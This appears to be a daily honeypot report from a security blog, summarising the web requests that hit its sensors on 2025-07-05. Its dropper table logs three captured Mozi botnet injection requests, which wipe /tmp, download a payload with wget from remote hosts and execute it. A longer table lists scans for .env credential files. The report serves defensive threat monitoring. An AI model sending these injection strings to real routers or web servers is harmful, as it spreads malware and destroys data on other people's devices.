Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-07-05

·484 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-05
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 37 new requests that have never been observed before (these were added to the monitored request database.).

A total of 4250 requests were recorded during the day, originating from 3 different countries, with a peak of 2706 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
DEGermany
SGGermany
USGermany
USGermany
USDubai
FRGeorgia
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
103.173.211.237GET /shell?cd+/tmp;rm+-rf+*;wget+http://103.173.211.237:40935/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
120.86.254.114GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
112.198.186.249GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://112.198.186.249:58935/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
224GET /app/.env.key HTTP/1.1
234GET /awsconf/.env HTTP/1.1
303GET /ssl.php HTTP/1.1
4201GET /0Mkt HTTP/1.1
4261GET /nmaplowercheck1751727559 HTTP/1.1
4331GET /NmapUpperCheck1751727559 HTTP/1.1
4361GET /Nmap/folder/check1751727559 HTTP/1.1
13331GET /socket.io/1/?t=1751683036334 HTTP/1.1
14521GET /api/.env.uat HTTP/1.1
14731GET /.env-public HTTP/1.1
14741GET /.env-apache HTTP/1.1
14751GET /.env-logger HTTP/1.1
14761GET /.env-svelte HTTP/1.1
14771GET /.env-stripe HTTP/1.1
15041GET /app/.env.gcp HTTP/1.1
15251GET /sy.php HTTP/1.1
15261\x00\x0E\x08\xFB\xEF\xAE\x0B\xBAG\xCA\xE3\x00\x00\x00\x00\x00
15271\x00\x0E8\xFB\xEF\xAE\x0B\xBAG\xCA\xE3\x00\x00\x00\x00\x00
15291\x00\x0E\x08,&y\xBD\xA8RM\xCB\x00\x00\x00\x00\x00
15301\x00\x0E8,&y\xBD\xA8RM\xCB\x00\x00\x00\x00\x00
15331GET /.env.save.2 HTTP/1.1
15341GET /.env.render HTTP/1.1
15351GET /.env-branch HTTP/1.1
15361GET /.env.passwd HTTP/1.1
15371GET /.env-strapi HTTP/1.1
15381GET /.env-models HTTP/1.1
15391GET /.env-readme HTTP/1.1
15411GET /.env-ci.yml HTTP/1.1
15421GET /.env.newest HTTP/1.1
15431GET /.env-config HTTP/1.1
15441GET /.env-nextjs HTTP/1.1
15471GET /.env-nodejs HTTP/1.1
15481GET /.env-worker HTTP/1.1
15491GET /.env.latest HTTP/1.1
15501GET /.env-stdout HTTP/1.1
15511GET /.env-stderr HTTP/1.1
15521GET /.env-oauth2 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
02706GB
1849US
2190DE
352IN
449SE
549VN
647NL
740FR
835CA
933BG
1027CN
1122AU
1216SC
1314JP
1412PL
1510RU
169MU
179BR
189TW
197BE
207TR
217ZA
226IR
236UA
245SG
255GH
263KZ
273HK
283AO
292EE
302GR
312GE
322KW
332LT
342IE
351AR
361AT
371MN
381PT
391SA
401PH
411CZ
421NG

Related

Report: 2025-07-04
·350 words
Repport Daily
Report: 2025-07-03
·384 words
Repport Daily
Report: 2025-07-02
·450 words
Repport Daily